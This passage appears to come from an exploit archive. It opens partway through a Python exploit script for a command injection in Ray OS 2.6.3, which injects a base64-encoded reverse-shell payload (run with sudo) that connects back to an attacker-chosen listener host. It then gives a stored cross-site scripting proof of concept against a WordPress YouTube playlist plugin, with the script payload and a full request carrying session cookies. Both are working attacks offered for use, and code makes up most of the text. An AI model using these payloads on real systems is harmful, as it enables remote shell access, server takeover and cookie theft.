verify=False, timeout=3)            if response.status_code != 200:                is_https = 0                return is_https        except Exception as e:            print("ERROR! The Exception is:" + format(e))    if https == 1:        return "https://" + target_url    else:        return "http://" + target_urldef exp(target,ip,lhost, lport):    payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''    print("[*]Payload is: " + payload)    b64_payload = base64.b64encode(payload.encode())    print("[*]Base64 encoding payload is: " + b64_payload.decode())    exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh`'    # response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess)    print(exp_url)    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)    response = requests.get(url=exp_url, headers=headers, verify=False)    if response.status_code == 200:        print("[-]ERROR: Exploit Failed,please check the payload.")    else:        print("[+]Exploit is finished,please check your machine!")if __name__ == '__main__':    parser = argparse.ArgumentParser(        description='''         ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀        ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄        ⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄        ⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃                                                    ⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄                            ⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄        ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀        ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄        ''',        formatter_class=argparse.RawDescriptionHelpFormatter,    )    parser.add_argument('-t', '--target', type=str, required=True, help='tart ip')    parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port')    parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip')    parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port')    args = parser.parse_args()    # target = args.target    ip = args.target    # port = args.port    # lhost = args.lhost    # lport = args.lport    targeturl = check_url(args.target, args.port)    print(targeturl)    print("[*] Checking in url: " + targeturl)    exp(targeturl, ip, args.lhost, args.lport)

Ray OS 2.6.3 Command Injection

WordPress Playlist for Youtube plugin version 1.32 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS)# Date: 22 March 2024# Exploit Author: Erdemstar# Vendor: https://wordpress.com/# Version: 1.32# Proof Of Concept:1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID".# PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns# Vulnerable Properties name: name, playlist_id# Payload: "><script>alert(document.cookie)</script># Request:POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2Host: erdemstar.localCookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9Content-Length: 178Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1Origin: https://erdemstar.localContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_freeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, i_wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000

Tag

#mac